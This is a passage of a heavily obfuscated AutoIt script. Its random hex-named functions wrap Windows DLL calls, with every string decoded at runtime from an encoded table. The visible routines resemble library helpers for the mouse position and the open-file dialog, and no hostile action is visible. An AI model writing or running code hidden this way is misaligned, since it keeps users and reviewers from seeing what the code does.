  2308.     Return $a505a20190d[Number($a547fa04646)]
  2309. EndFunc
  2310.  
  2311. Func a2650201d57()
  2312.     If NOT IsDeclared("SSA2650201D57") Then
  2313.         Global $a457fb05e2a = a2b00005424($os[2093]), $a0c7fc04a5f = a2b00005424($os[2094]), $a2f7fd00351 = a2b00005424($os[2095]), $a267fe05410 = a2b00005424($os[2096]), $a3b7ff05623 = a2b00005424($os[2097])
  2314.         Global $ssa2650201d57 = 1
  2315.     EndIf
  2316.     Local $a505a20190d = DllCall($a457fb05e2a, $a0c7fc04a5f, $a2f7fd00351)
  2317.     If @error Then Return SetError(@error, @extended, Number($a267fe05410))
  2318.     Return $a505a20190d[Number($a3b7ff05623)]
  2319. EndFunc
  2320.  
  2321. Func a4250305e2b($a5d8f00532a = 0, $a598f105931 = -1)
  2322.     If NOT IsDeclared("SSA4250305E2B") Then
  2323.         Global $a248f20355f = a2b00005424($os[2098]), $a578f301e07 = a2b00005424($os[2099]), $a438f401f09 = a2b00005424($os[2100]), $a178f501c16 = a2b00005424($os[2101]), $a5d8f605f4c = a2b00005424($os[2102]), $a248f706336 = a2b00005424($os[2103]), $a458f803a5c = a2b00005424($os[2104]), $a088f904b07 = a2b00005424($os[2105])
  2324.         Global $ssa4250305e2b = 1
  2325.     EndIf
  2326.     If $a598f105931 = -Number($a248f20355f) Then $a598f105931 = a2640603e3e()
  2327.     Local $a505a20190d = DllCall($a578f301e07, $a438f401f09, $a178f501c16, $a5d8f605f4c, $a598f105931, $a248f706336, $a5d8f00532a)
  2328.     If @error Then Return SetError(@error, @extended, Number($a458f803a5c))
  2329.     Return $a505a20190d[Number($a088f904b07)]
  2330. EndFunc
  2331.  
  2332. Func a5d50403f5c($a3a9c101b29)
  2333.     If NOT IsDeclared("SSA5D50403F5C") Then
  2334.         Global $a358fb03f48 = a2b00005424($os[2106]), $a388fc04739 = a2b00005424($os[2107]), $a0f8fd04206 = a2b00005424($os[2108]), $a0a8fe03a1e = a2b00005424($os[2109]), $a0a8ff02c4c = a2b00005424($os[2110]), $a1a9f005302 = a2b00005424($os[2111]), $a279f201323 = a2b00005424($os[2112]), $a599f300551 = a2b00005424($os[2113]), $a3b9f403038 = a2b00005424($os[2114]), $a4a9f502507 = a2b00005424($os[2115]), $a389f60530e = a2b00005424($os[2116]), $a199f703c12 = a2b00005424($os[2117]), $a4b9f804c3b = a2b00005424($os[2118]), $a1c9f905238 = a2b00005424($os[2119]), $a089fa04346 = a2b00005424($os[2120]), $a149fb04713 = a2b00005424($os[2121]), $a099fc01a2c = a2b00005424($os[2122]), $a509fd02b07 = a2b00005424($os[2123]), $a3d9fe03b5f = a2b00005424($os[2124])
  2335.         Global $ssa5d50403f5c = 1
  2336.     EndIf
  2337.     Local $a358fa00150 = DllStructCreate($a52cb902d32)
  2338.     DllCall($a358fb03f48, $a388fc04739, $a0f8fd04206, $a0a8fe03a1e, $a3a9c101b29, $a0a8ff02c4c, $a358fa00150)
  2339.     If @error Then Return SetError(@error, @extended, Number($a1a9f005302))
  2340.     Local $a239f102a5e[Number($a279f201323)]
  2341.     $a239f102a5e[Number($a599f300551)] = True
  2342.     $a239f102a5e[Number($a3b9f403038)] = DllStructGetData($a358fa00150, $a4a9f502507) <> Number($a389f60530e)
  2343.     $a239f102a5e[Number($a199f703c12)] = DllStructGetData($a358fa00150, $a4b9f804c3b)
  2344.     $a239f102a5e[Number($a1c9f905238)] = DllStructGetData($a358fa00150, $a089fa04346)
  2345.     $a239f102a5e[Number($a149fb04713)] = DllStructGetData($a358fa00150, $a099fc01a2c)
  2346.     $a239f102a5e[Number($a509fd02b07)] = DllStructGetData($a358fa00150, $a3d9fe03b5f)
  2347.     Return $a239f102a5e
  2348. EndFunc
  2349.  
  2350. Func a4c5050012f($a28cec03a24)
  2351.     If NOT IsDeclared("SSA4C5050012F") Then
  2352.         Global $a469ff04d0f = a2b00005424($os[2125]), $a30af004927 = a2b00005424($os[2126]), $a17af103648 = a2b00005424($os[2127]), $a44af202711 = a2b00005424($os[2128]), $a54af30210a = a2b00005424($os[2129]), $a13af400f25 = a2b00005424($os[2130]), $a45af500e61 = a2b00005424($os[2131]), $a1baf601307 = a2b00005424($os[2132])
  2353.         Global $ssa4c5050012f = 1
  2354.     EndIf
  2355.     Local $a505a20190d = DllCall($a469ff04d0f, $a30af004927, $a17af103648, $a44af202711, $a28cec03a24, $a54af30210a, Number($a13af400f25))
  2356.     If @error Then Return SetError(@error, @extended, Number($a45af500e61))
  2357.     Return $a505a20190d[Number($a1baf601307)]
  2358. EndFunc
  2359.  
  2360. Func a305060311b()
  2361.     If NOT IsDeclared("SSA305060311B") Then
  2362.         Global $a63af80155f = a2b00005424($os[2133]), $a53afa04610 = a2b00005424($os[2134]), $a4fafb03117 = a2b00005424($os[2135]), $a01afc05833 = a2b00005424($os[2136]), $a30afd03620 = a2b00005424($os[2137]), $a45afe00f56 = a2b00005424($os[2138]), $a0baff04014 = a2b00005424($os[2139]), $a33bf00163c = a2b00005424($os[2140]), $a4ebf204326 = a2b00005424($os[2141]), $a61bf30230e = a2b00005424($os[2142]), $a5ebf404715 = a2b00005424($os[2143]), $a3dbf502c2e = a2b00005424($os[2144])
  2363.         Global $ssa305060311b = 1
  2364.     EndIf
  2365.     Local $a5caf703914 = DllStructCreate($a63af80155f)
  2366.     Local $a53af900c1c = a3730c0595a(BitOR($a3beaa01949, $a39eac02452), Number($a53afa04610), a3e00102e0a(), Number($a4fafb03117), $a5caf703914, Number($a01afc05833), Number($a30afd03620))
  2367.     If @error Then Return SetError(@error, Number($a45afe00f56), "")
  2368.     Local $a09fd400f0d = ""
  2369.     Local $a0dde500c4b = DllStructGetData($a5caf703914, Number($a0baff04014))
  2370.     If $a0dde500c4b Then
  2371.         If $a53af900c1c > Number($a33bf00163c) Then
  2372.             Local $a25bf105841 = DllStructCreate($a4ebf204326 & ($a53af900c1c + Number($a61bf30230e)) & $a5ebf404715, $a0dde500c4b)
  2373.             $a09fd400f0d = DllStructGetData($a25bf105841, Number($a3dbf502c2e))
  2374.         EndIf
  2375.         a5380504f5c($a0dde500c4b)
  2376.     EndIf
  2377.     Return $a09fd400f0d
  2378. EndFunc
  2379.  
  2380. Func a5350701017($a3eca000d54, ByRef $a2bbf603a1e, ByRef $a5dbf70404f, $a3abf80124b = False)
  2381.     If NOT IsDeclared("SSA5350701017") Then
  2382.         Global $a0fbf900725 = a2b00005424($os[2145]), $a60bfa05315 = a2b00005424($os[2146]), $a1fbfb02602 = a2b00005424($os[2147]), $a28bfc0442d = a2b00005424($os[2148]), $a1dbfd01521 = a2b00005424($os[2149]), $a10bfe04249 = a2b00005424($os[2150]), $a02bff06160 = a2b00005424($os[2151]), $a01cf00605d = a2b00005424($os[2152]), $a2fcf102242 = a2b00005424($os[2153]), $a05cf203b5c = a2b00005424($os[2154]), $a50cf300245 = a2b00005424($os[2155]), $a53cf406114 = a2b00005424($os[2156]), $a41cf50332c = a2b00005424($os[2157]), $a5ecf60514b = a2b00005424($os[2158]), $a2ccf70314f = a2b00005424($os[2159]), $a00cf803563 = a2b00005424($os[2160]), $a61cf903848 = a2b00005424($os[2161]), $a21cfa02933 = a2b00005424($os[2162]), $a0ecfb03541 = a2b00005424($os[2163]), $a63cfc03719 = a2b00005424($os[2164]), $a32cfd0562a = a2b00005424($os[2165]), $a13cfe02334 = a2b00005424($os[2166]), $a17cff03447 = a2b00005424($os[2167]), $a5adf005722 = a2b00005424($os[2168])
  2383.         Global $ssa5350701017 = 1
  2384.     EndIf
  2385.     $a2bbf603a1e = -Number($a0fbf900725)
  2386.     $a5dbf70404f = -Number($a60bfa05315)
  2387.     Local $a505a20190d = DllCall($a1fbfb02602, $a28bfc0442d, $a1dbfd01521, $a10bfe04249, $a3eca000d54, $a02bff06160, $a2bbf603a1e, $a01cf00605d, $a5dbf70404f, $a2fcf102242, Number($a05cf203b5c))
  2388.     If @error Then Return SetError(@error, @extended, Number($a50cf300245))
  2389.     If NOT $a3abf80124b Then
  2390.         $a505a20190d[Number($a53cf406114)] = Int(BinaryMid($a505a20190d[Number($a41cf50332c)], Number($a5ecf60514b), Number($a2ccf70314f)) & BinaryMid($a505a20190d[Number($a00cf803563)], Number($a61cf903848), Number($a21cfa02933)) & BinaryMid($a505a20190d[Number($a0ecfb03541)], Number($a63cfc03719), Number($a32cfd0562a)))
  2391.     EndIf
  2392.     $a2bbf603a1e = $a505a20190d[Number($a13cfe02334)]
  2393.     $a5dbf70404f = $a505a20190d[Number($a17cff03447)]
  2394.     Return $a505a20190d[Number($a5adf005722)]
  2395. EndFunc
  2396.  
  2397. Func a5450806108($a21df105438)
  2398.     If NOT IsDeclared("SSA5450806108") Then
  2399.         Global $a58df303311 = a2b00005424($os[2169]), $a1bdf401d20 = a2b00005424($os[2170]), $a34df50570b = a2b00005424($os[2171]), $a09df602e04 = a2b00005424($os[2172]), $a22df702d11 = a2b00005424($os[2173]), $a35df805423 = a2b00005424($os[2174]), $a53df902b0b = a2b00005424($os[2175]), $a2edfa0423c = a2b00005424($os[2176])
  2400.         Global $ssa5450806108 = 1
  2401.     EndIf
  2402.     Local $a12df20392c = $a58df303311
  2403.     If $a21df105438 = "" Then
  2404.         $a21df105438 = Number($a1bdf401d20)
  2405.         $a12df20392c = $a34df50570b
  2406.     EndIf
  2407.     Local $a505a20190d = DllCall($a09df602e04, $a22df702d11, $a35df805423, $a12df20392c, $a21df105438)
  2408.     If @error Then Return SetError(@error, @extended, Number($a53df902b0b))
  2409.     Return $a505a20190d[Number($a2edfa0423c)]
  2410. EndFunc
  2411.  
  2412. Func a4a50905f20($a2ddfb04141 = False, $a3eca000d54 = 0)
  2413.     If NOT IsDeclared("SSA4A50905F20") Then
  2414.         Global $a4ddfc0241a = a2b00005424($os[2177]), $a0fdfd0491c = a2b00005424($os[2178]), $a42dff00039 = a2b00005424($os[2179]), $a1fef00413c = a2b00005424($os[2180]), $a5eef101038 = a2b00005424($os[2181]), $a32ef201916 = a2b00005424($os[2182]), $a36ef302926 = a2b00005424($os[2183]), $a14ef402619 = a2b00005424($os[2184])
  2415.         Global $ssa4a50905f20 = 1
  2416.     EndIf
  2417.     Local $a2fbe105318 = Opt($a4ddfc0241a, Number($a0fdfd0491c))
  2418.     Local $a5cdfe04a1b = MouseGetPos()
  2419.     Opt($a42dff00039, $a2fbe105318)
  2420.     Local $a4d1c401e56 = DllStructCreate($a2928c0302e)
  2421.     DllStructSetData($a4d1c401e56, $a1fef00413c, $a5cdfe04a1b[Number($a5eef101038)])
  2422.     DllStructSetData($a4d1c401e56, $a32ef201916, $a5cdfe04a1b[Number($a36ef302926)])
  2423.     If $a2ddfb04141 Then
  2424.         a46a010220d($a3eca000d54, $a4d1c401e56)
  2425.         If @error Then Return SetError(@error, @extended, Number($a14ef402619))
  2426.     EndIf
  2427.     Return $a4d1c401e56
  2428. EndFunc
  2429.  
  2430. Func a3850a04c1e($a2ddfb04141 = False, $a3eca000d54 = 0)
  2431.     If NOT IsDeclared("SSA3850A04C1E") Then
  2432.         Global $a35ef502c3b = a2b00005424($os[2185]), $a44ef604649 = a2b00005424($os[2186])
  2433.         Global $ssa3850a04c1e = 1
  2434.     EndIf
  2435.     Local $a4d1c401e56 = a4a50905f20($a2ddfb04141, $a3eca000d54)
  2436.     If @error Then Return SetError(@error, @extended, Number($a35ef502c3b))
  2437.     Return DllStructGetData($a4d1c401e56, $a44ef604649)
  2438. EndFunc
  2439.  
  2440. Func a4350b00353($a2ddfb04141 = False, $a3eca000d54 = 0)
  2441.     If NOT IsDeclared("SSA4350B00353") Then
  2442.         Global $a36ef704860 = a2b00005424($os[2187]), $a59ef804b26 = a2b00005424($os[2188])
  2443.         Global $ssa4350b00353 = 1
  2444.     EndIf
  2445.     Local $a4d1c401e56 = a4a50905f20($a2ddfb04141, $a3eca000d54)
  2446.     If @error Then Return SetError(@error, @extended, Number($a36ef704860))
  2447.     Return DllStructGetData($a4d1c401e56, $a59ef804b26)
  2448. EndFunc
  2449.  
  2450. Func a2950c04e60($a491ca0352d, $a11de601b14, $a2def90432d)
  2451.     If NOT IsDeclared("SSA2950C04E60") Then
  2452.         Global $a2befa03636 = a2b00005424($os[2189]), $a4fefb0612a = a2b00005424($os[2190]), $a35efc00634 = a2b00005424($os[2191]), $a36efd0501b = a2b00005424($os[2192]), $a18efe0004a = a2b00005424($os[2193]), $a07eff05e5a = a2b00005424($os[2194]), $a4bff006144 = a2b00005424($os[2195]), $a06ff10491a = a2b00005424($os[2196])
  2453.         Global $ssa2950c04e60 = 1
  2454.     EndIf
  2455.     Local $a505a20190d = DllCall($a2befa03636, $a4fefb0612a, $a35efc00634, $a36efd0501b, $a491ca0352d, $a18efe0004a, $a11de601b14, $a07eff05e5a, $a2def90432d)
  2456.     If @error Then Return SetError(@error, @extended, Number($a4bff006144))
  2457.     Return $a505a20190d[Number($a06ff10491a)]
  2458. EndFunc
  2459.  
  2460. Func a5e50d04863($a04ff200620 = "", $a60ff30390f = "All files (*.*)", $a0bff404a40 = ".", $a21ff502e2e = "", $a46ff601c57 = "", $a29ff701f57 = 1, $a103d00243d = 0, $a4cff802a2c = 0, $a26ff902411 = 0)
  2461.     If NOT IsDeclared("SSA5E50D04863") Then
  2462.         Global $a5affb05216 = a2b00005424($os[2197]), $a57ffd05d3e = a2b00005424($os[2198]), $a6200013b1a = a2b00005424($os[2199]), $a5700115a22 = a2b00005424($os[2200]), $a430031381b = a2b00005424($os[2201]), $a3700514f56 = a2b00005424($os[2202]), $a1800611c55 = a2b00005424($os[2203]), $a0e00713449 = a2b00005424($os[2204]), $a3900b10e1a = a2b00005424($os[2205]), $a6300c1325e = a2b00005424($os[2206]), $a2900d15912 = a2b00005424($os[2207]), $a1a00f1293b = a2b00005424($os[2208]), $a571001572c = a2b00005424($os[2209]), $a1c10115348 = a2b00005424($os[2210]), $a2710213c51 = a2b00005424($os[2211]), $a5510310956 = a2b00005424($os[2212]), $a5710411f13 = a2b00005424($os[2213]), $a021051191f = a2b00005424($os[2214]), $a4910611c16 = a2b00005424($os[2215]), $a211071010f = a2b00005424($os[2216]), $a1810810159 = a2b00005424($os[2217]), $a3910911404 = a2b00005424($os[2218]), $a5110a1093a = a2b00005424($os[2219]), $a2c10b11543 = a2b00005424($os[2220]), $a3c10c14e31 = a2b00005424($os[2221]), $a0c10d1153b = a2b00005424($os[2222]), $a3310e10d1f = a2b00005424($os[2223]), $a0610f11e2f = a2b00005424($os[2224]), $a4320011a2c = a2b00005424($os[2225]), $a212011182e = a2b00005424($os[2226]), $a0f20212d12 = a2b00005424($os[2227]), $a5e20314833 = a2b00005424($os[2228]), $a442041375b = a2b00005424($os[2229]), $a2e20512947 = a2b00005424($os[2230]), $a6220715314 = a2b00005424($os[2231]), $a2c2081541f = a2b00005424($os[2232]), $a3c20914e12 = a2b00005424($os[2233]), $a5520b15d63 = a2b00005424($os[2234]), $a0620c10d3b = a2b00005424($os[2235]), $a1a20d12f10 = a2b00005424($os[2236]), $a2120f1391e = a2b00005424($os[2237]), $a3d30113b52 = a2b00005424($os[2238]), $a5330212837 = a2b00005424($os[2239]), $a173041421a = a2b00005424($os[2240]), $a073051213b = a2b00005424($os[2241]), $a2a30614e4a = a2b00005424($os[2242]), $a6230710c55 = a2b00005424($os[2243]), $a1930810144 = a2b00005424($os[2244]), $a4030913f37 = a2b00005424($os[2245]), $a2630a14361 = a2b00005424($os[2246]), $a3e30b12f15 = a2b00005424($os[2247]), $a1e30c13d3f = a2b00005424($os[2248]), $a4d30d14105 = a2b00005424($os[2249])
  2463.         Global $a1e30e10359 = a2b00005424($os[2250]), $a1930f11f13 = a2b00005424($os[2251]), $a3a4001592d = a2b00005424($os[2252]), $a4040112825 = a2b00005424($os[2253]), $a3d40214d5f = a2b00005424($os[2254]), $a0440314645 = a2b00005424($os[2255]), $a5d4041113f = a2b00005424($os[2256]), $a1740512d0a = a2b00005424($os[2257]), $a2040611924 = a2b00005424($os[2258]), $a1040710756 = a2b00005424($os[2259]), $a1b40814463 = a2b00005424($os[2260]), $a314091625c = a2b00005424($os[2261]), $a5140a12736 = a2b00005424($os[2262]), $a0240b13d1f = a2b00005424($os[2263]), $a0d40d15042 = a2b00005424($os[2264]), $a4f40e1325d = a2b00005424($os[2265]), $a4f40f13916 = a2b00005424($os[2266]), $a0550015409 = a2b00005424($os[2267]), $a0450111418 = a2b00005424($os[2268]), $a395021502f = a2b00005424($os[2269]), $a2850310b60 = a2b00005424($os[2270]), $a1250410c25 = a2b00005424($os[2271]), $a0650513418 = a2b00005424($os[2272]), $a2750612543 = a2b00005424($os[2273]), $a2d5071214a = a2b00005424($os[2274]), $a1c50812a44 = a2b00005424($os[2275]), $a4150912f60 = a2b00005424($os[2276]), $a2750a13534 = a2b00005424($os[2277]), $a0850b12736 = a2b00005424($os[2278]), $a5450c13b34 = a2b00005424($os[2279]), $a3950d1114d = a2b00005424($os[2280]), $a2150e13a16 = a2b00005424($os[2281]), $a1150f15242 = a2b00005424($os[2282]), $a5660014d22 = a2b00005424($os[2283]), $a0c60116257 = a2b00005424($os[2284]), $a5660214616 = a2b00005424($os[2285]), $a0760313855 = a2b00005424($os[2286]), $a1c60412f1c = a2b00005424($os[2287]), $a2b60514228 = a2b00005424($os[2288]), $a1a60611b1f = a2b00005424($os[2289]), $a0d6071341c = a2b00005424($os[2290]), $a0560811002 = a2b00005424($os[2291])
  2464.         Global $ssa5e50d04863 = 1
  2465.     EndIf
  2466.     Local $a60ffa04558 = Number($a5affb05216)
  2467.     Local $a09ffc0292e = Number($a57ffd05d3e)
  2468.     Local $a4fffe0303b = DllStructCreate($a61f8d0260a)
  2469.     Local $a03fff05b24[Number($a6200013b1a)] = [Number($a5700115a22)]
  2470.     Local $a5d8f00532a = $a103d00243d
  2471.     Local $a2300211508 = StringSplit($a60ff30390f, $a430031381b)
  2472.     Local $a5d0041532a[$a2300211508[Number($a3700514f56)] * Number($a1800611c55) + Number($a0e00713449)]
  2473.     Local $a620081194b, $a2d0091152c, $a5e00a15749
  2474.     $a5d0041532a[Number($a3900b10e1a)] = $a2300211508[Number($a6300c1325e)] * Number($a2900d15912)
  2475.     For $a3800e12616 = Number($a1a00f1293b) To $a2300211508[Number($a571001572c)]
  2476.         $a620081194b = StringInStr($a2300211508[$a3800e12616], $a1c10115348, Number($a2710213c51), Number($a5510310956))
  2477.         $a2d0091152c = StringInStr($a2300211508[$a3800e12616], $a5710411f13, Number($a021051191f), -Number($a4910611c16))
  2478.         $a5d0041532a[$a3800e12616 * Number($a211071010f) - Number($a1810810159)] = StringStripWS(StringLeft($a2300211508[$a3800e12616], $a620081194b - Number($a3910911404)), Number($a5110a1093a))
  2479.         $a5d0041532a[$a3800e12616 * Number($a2c10b11543)] = StringStripWS(StringTrimRight(StringTrimLeft($a2300211508[$a3800e12616], $a620081194b), StringLen($a2300211508[$a3800e12616]) - $a2d0091152c + Number($a3c10c14e31)), Number($a0c10d1153b))
  2480.         $a5e00a15749 &= $a3310e10d1f & StringLen($a5d0041532a[$a3800e12616 * Number($a0610f11e2f) - Number($a4320011a2c)]) + Number($a212011182e) & $a0f20212d12 & StringLen($a5d0041532a[$a3800e12616 * Number($a5e20314833)]) + Number($a442041375b) & $a2e20512947
  2481.     Next
  2482.     Local $a4320611c58 = DllStructCreate($a6220715314 & StringLen($a04ff200620) + Number($a2c2081541f) & $a3c20914e12)
  2483.     Local $a4420a16202 = DllStructCreate($a5520b15d63 & StringLen($a0bff404a40) + Number($a0620c10d3b) & $a1a20d12f10)
  2484.     Local $a4120e13b54 = DllStructCreate($a5e00a15749 & $a2120f1391e)
  2485.     Local $a1b30016162 = DllStructCreate($a3d30113b52 & $a60ffa04558 & $a5330212837)
  2486.     Local $a1430314e31 = DllStructCreate($a173041421a & StringLen($a46ff601c57) + Number($a073051213b) & $a2a30614e4a)
  2487.     For $a3800e12616 = Number($a6230710c55) To $a5d0041532a[Number($a1930810144)]
  2488.         DllStructSetData($a4120e13b54, $a3800e12616, $a5d0041532a[$a3800e12616])
  2489.     Next
  2490.     DllStructSetData($a4320611c58, $a4030913f37, $a04ff200620)
  2491.     DllStructSetData($a4420a16202, $a2630a14361, $a0bff404a40)
  2492.     DllStructSetData($a1b30016162, $a3e30b12f15, $a21ff502e2e)
  2493.     DllStructSetData($a1430314e31, $a1e30c13d3f, $a46ff601c57)
  2494.     DllStructSetData($a4fffe0303b, $a4d30d14105, DllStructGetSize($a4fffe0303b))
  2495.     DllStructSetData($a4fffe0303b, $a1e30e10359, $a26ff902411)
  2496.     DllStructSetData($a4fffe0303b, $a1930f11f13, DllStructGetPtr($a4120e13b54))
  2497.     DllStructSetData($a4fffe0303b, $a3a4001592d, $a29ff701f57)
  2498.     DllStructSetData($a4fffe0303b, $a4040112825, DllStructGetPtr($a1b30016162))
  2499.     DllStructSetData($a4fffe0303b, $a3d40214d5f, $a60ffa04558)
  2500.     DllStructSetData($a4fffe0303b, $a0440314645, DllStructGetPtr($a4420a16202))
  2501.     DllStructSetData($a4fffe0303b, $a5d4041113f, DllStructGetPtr($a4320611c58))
  2502.     DllStructSetData($a4fffe0303b, $a1740512d0a, $a5d8f00532a)
  2503.     DllStructSetData($a4fffe0303b, $a2040611924, DllStructGetPtr($a1430314e31))
  2504.     DllStructSetData($a4fffe0303b, $a1040710756, $a4cff802a2c)
  2505.     DllCall($a1b40814463, $a314091625c, $a5140a12736, $a0240b13d1f, $a4fffe0303b)
  2506.     If @error Then Return SetError(@error, @extended, $a03fff05b24)
  2507.     If BitAND($a103d00243d, $a288b102a22) = $a288b102a22 AND BitAND($a103d00243d, $a549b105662) = $a549b105662 Then
  2508.         For $a3040c14f22 = Number($a0d40d15042) To $a60ffa04558
  2509.             If DllStructGetData($a1b30016162, $a4f40e1325d, $a3040c14f22) = Chr(Number($a4f40f13916)) Then
  2510.                 DllStructSetData($a1b30016162, $a0550015409, $a0450111418, $a3040c14f22)
  2511.                 $a09ffc0292e += Number($a395021502f)
  2512.             Else
  2513.                 $a09ffc0292e = Number($a2850310b60)
  2514.             EndIf
  2515.             If $a09ffc0292e = Number($a1250410c25) Then ExitLoop
  2516.         Next
  2517.         DllStructSetData($a1b30016162, $a0650513418, Chr(Number($a2750612543)), $a3040c14f22 - Number($a2d5071214a))
  2518.         $a03fff05b24 = StringSplit(DllStructGetData($a1b30016162, $a1c50812a44), $a4150912f60)
  2519.         If $a03fff05b24[Number($a2750a13534)] = Number($a0850b12736) Then Return a5790403f1e(DllStructGetData($a1b30016162, $a5450c13b34))
  2520.         Return StringSplit(DllStructGetData($a1b30016162, $a3950d1114d), $a2150e13a16)
  2521.     ElseIf BitAND($a103d00243d, $a288b102a22) = $a288b102a22 Then
  2522.         $a03fff05b24 = StringSplit(DllStructGetData($a1b30016162, $a1150f15242), $a5660014d22)
  2523.         If $a03fff05b24[Number($a0c60116257)] = Number($a5660214616) Then Return a5790403f1e(DllStructGetData($a1b30016162, $a0760313855))
  2524.         Return StringSplit(StringReplace(DllStructGetData($a1b30016162, $a1c60412f1c), $a2b60514228, $a1a60611b1f), $a0d6071341c)
  2525.     Else
  2526.         Return a5790403f1e(DllStructGetData($a1b30016162, $a0560811002))
  2527.     EndIf
  2528. EndFunc
  2529.  
  2530. Func a1350e01a39($a28cec03a24, $a1960914250, ByRef $a5360a1142c, $a2760b11236 = False)
  2531.     If NOT IsDeclared("SSA1350E01A39") Then
  2532.         Global $a2760c13463 = a2b00005424($os[2292]), $a4760d13662 = a2b00005424($os[2293]), $a2a60e15a08 = a2b00005424($os[2294]), $a5f60f1595e = a2b00005424($os[2295]), $a0b7001394e = a2b00005424($os[2296]), $a2f70114109 = a2b00005424($os[2297]), $a2370210c17 = a2b00005424($os[2298]), $a0970310e2e = a2b00005424($os[2299]), $a3e70412000 = a2b00005424($os[2300]), $a1070514e3e = a2b00005424($os[2301])
  2533.         Global $ssa1350e01a39 = 1
  2534.     EndIf
  2535.     Local $a505a20190d = DllCall($a2760c13463, $a4760d13662, $a2a60e15a08, $a5f60f1595e, $a28cec03a24, $a0b7001394e, $a1960914250, $a2f70114109, Number($a2370210c17), $a0970310e2e, $a2760b11236)
  2536.     If @error Then Return SetError(@error, @extended, False)
  2537.     $a5360a1142c = $a505a20190d[Number($a3e70412000)]
  2538.     Return $a505a20190d[Number($a1070514e3e)]
  2539. EndFunc
  2540.  
  2541. Func a5b50f0155e($a3eca000d54)
  2542.     If NOT IsDeclared("SSA5B50F0155E") Then
  2543.         Global $a3670612643 = a2b00005424($os[2302]), $a1f70713543 = a2b00005424($os[2303]), $a4e70811c2e = a2b00005424($os[2304]), $a1770913217 = a2b00005424($os[2305]), $a4870a10311 = a2b00005424($os[2306]), $a0b70b14e54 = a2b00005424($os[2307])
  2544.         Global $ssa5b50f0155e = 1
  2545.     EndIf
  2546.     Local $a505a20190d = DllCall($a3670612643, $a1f70713543, $a4e70811c2e, $a1770913217, $a3eca000d54)
  2547.     If @error Then Return SetError(@error, @extended, Number($a4870a10311))
  2548.     Return $a505a20190d[Number($a0b70b14e54)]
  2549. EndFunc
  2550.  
  2551. Func a1c60005c5d($a598f105931)
  2552.     If NOT IsDeclared("SSA1C60005C5D") Then
  2553.         Global $a5270c11819 = a2b00005424($os[2308]), $a4e70d14759 = a2b00005424($os[2309]), $a5270e15120 = a2b00005424($os[2310]), $a0770f12a17 = a2b00005424($os[2311]), $a3680012855 = a2b00005424($os[2312]), $a168011574e = a2b00005424($os[2313]), $a0180215c34 = a2b00005424($os[2314]), $a3a8031000c = a2b00005424($os[2315]), $a5a8041521e = a2b00005424($os[2316]), $a0480611f01 = a2b00005424($os[2317]), $a2080712f11 = a2b00005424($os[2318]), $a5780814240 = a2b00005424($os[2319]), $a3780915939 = a2b00005424($os[2320]), $a0880a12a48 = a2b00005424($os[2321]), $a5680b15a56 = a2b00005424($os[2322])
  2554.         Global $ssa1c60005c5d = 1
  2555.     EndIf
  2556.     Local $a505a20190d = DllCall($a5270c11819, $a4e70d14759, $a5270e15120, $a0770f12a17, $a598f105931, $a3680012855, Number($a168011574e), $a0180215c34, Number($a3a8031000c))
  2557.     If @error Then Return SetError(@error, @extended, Number($a5a8041521e))
  2558.     Local $a2f80516237[Number($a0480611f01)]
  2559.     $a2f80516237[Number($a2080712f11)] = True
  2560.     $a2f80516237[Number($a5780814240)] = $a505a20190d[Number($a3780915939)]
  2561.     $a2f80516237[Number($a0880a12a48)] = $a505a20190d[Number($a5680b15a56)]
  2562.     Return $a2f80516237
  2563. EndFunc
  2564.  
  2565. Func a376010552e($a04ff200620 = "", $a60ff30390f = "All files (*.*)", $a0bff404a40 = ".", $a21ff502e2e = "", $a46ff601c57 = "", $a29ff701f57 = 1, $a103d00243d = 0, $a4cff802a2c = 0, $a26ff902411 = 0)
  2566.     If NOT IsDeclared("SSA376010552E") Then
  2567.         Global $a0d80c10562 = a2b00005424($os[2323]), $a1080d14451 = a2b00005424($os[2324]), $a5680e1542d = a2b00005424($os[2325]), $a5880f15750 = a2b00005424($os[2326]), $a6190014c0f = a2b00005424($os[2327]), $a3990113e63 = a2b00005424($os[2328]), $a2e90214f49 = a2b00005424($os[2329]), $a3c90315405 = a2b00005424($os[2330]), $a4990414020 = a2b00005424($os[2331]), $a3f90514e09 = a2b00005424($os[2332]), $a4790610d2f = a2b00005424($os[2333]), $a4190712545 = a2b00005424($os[2334]), $a079081072b = a2b00005424($os[2335]), $a5990910c06 = a2b00005424($os[2336]), $a1c90a1520a = a2b00005424($os[2337]), $a0890b15334 = a2b00005424($os[2338]), $a1090c11335 = a2b00005424($os[2339]), $a5390d1014e = a2b00005424($os[2340]), $a2390e10016 = a2b00005424($os[2341]), $a3490f12516 = a2b00005424($os[2342]), $a06a0013422 = a2b00005424($os[2343]), $a2da011180c = a2b00005424($os[2344]), $a4ba0210f50 = a2b00005424($os[2345]), $a5ea0313837 = a2b00005424($os[2346]), $a2fa0414216 = a2b00005424($os[2347]), $a01a0512f15 = a2b00005424($os[2348]), $a4ba0612a14 = a2b00005424($os[2349]), $a63a0711c5f = a2b00005424($os[2350]), $a2ea081035b = a2b00005424($os[2351]), $a37a0915608 = a2b00005424($os[2352]), $a4ea0a15137 = a2b00005424($os[2353]), $a3fa0b12b32 = a2b00005424($os[2354]), $a02a0c1245a = a2b00005424($os[2355]), $a31a0d11e2d = a2b00005424($os[2356]), $a35a0e14347 = a2b00005424($os[2357]), $a30a0f11d62 = a2b00005424($os[2358]), $a12b0010750 = a2b00005424($os[2359]), $a4eb0110635 = a2b00005424($os[2360]), $a01b0212042 = a2b00005424($os[2361]), $a5fb031535a = a2b00005424($os[2362]), $a3bb0414e5f = a2b00005424($os[2363]), $a23b0515702 = a2b00005424($os[2364]), $a12b061100e = a2b00005424($os[2365]), $a3fb0712838 = a2b00005424($os[2366]), $a14b0811b5c = a2b00005424($os[2367]), $a3cb0914b3c = a2b00005424($os[2368]), $a4db0a12838 = a2b00005424($os[2369]), $a31b0b14a34 = a2b00005424($os[2370]), $a0bb0c15602 = a2b00005424($os[2371]), $a51b0d10436 = a2b00005424($os[2372]), $a5cb0e10a63 = a2b00005424($os[2373]), $a55b0f13515 = a2b00005424($os[2374]), $a27c001265c = a2b00005424($os[2375])
